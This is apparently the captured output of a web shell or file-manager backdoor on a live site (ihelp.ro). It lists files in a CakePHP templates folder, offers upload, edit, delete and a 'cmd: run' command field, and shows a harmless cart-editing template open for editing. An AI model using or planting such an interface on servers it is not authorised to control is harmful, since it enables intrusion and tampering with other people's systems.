/
var
/
www
/
vhosts
/
ihelp.ro
/
httpdocs
/
templates
/
Carts
/
/var/www/vhosts/ihelp.ro/httpdocs/templates/Carts
mkdir
upload
Name
Size
Mode
Actions
add.php
867
0644
edit
dl
rm
edit.php
1124
0644
edit
dl
rm
index.php
2481
0644
edit
dl
rm
view.bkp.php
6011
0644
edit
dl
rm
view.php
9258
0644
edit
dl
rm
Edit:
/var/www/vhosts/ihelp.ro/httpdocs/templates/Carts/edit.php
(1124B)
<div class="row"> <aside class="column-20"> <div class="side-nav"> <h4 class="heading"><?php echo __('Actions'); ?></h4> <?php echo $this->Form->postLink( __('Delete'), ['action' => 'delete', $cart->id], ['confirm' => __('Are you sure you want to delete # {0}?', $cart->id), 'class' => 'side-nav-item'] ) ?> <?php echo $this->Html->link(__('List Carts'), ['action' => 'index'], ['class' => 'side-nav-item']) ?> </div> </aside> <div class="column-responsive column-80"> <div class="carts form content"> <?php echo $this->Form->create($cart); ?> <fieldset> <legend><?php echo __('Edit Cart'); ?></legend> <?php echo $this->Form->control('uuid'); echo $this->Form->control('user_id', ['options' => $users, 'empty' => true]); ?> </fieldset> <?php echo $this->Form->button(__('Submit')); ?> <?php echo $this->Form->end(); ?> </div> </div> </div>
Save
cmd:
run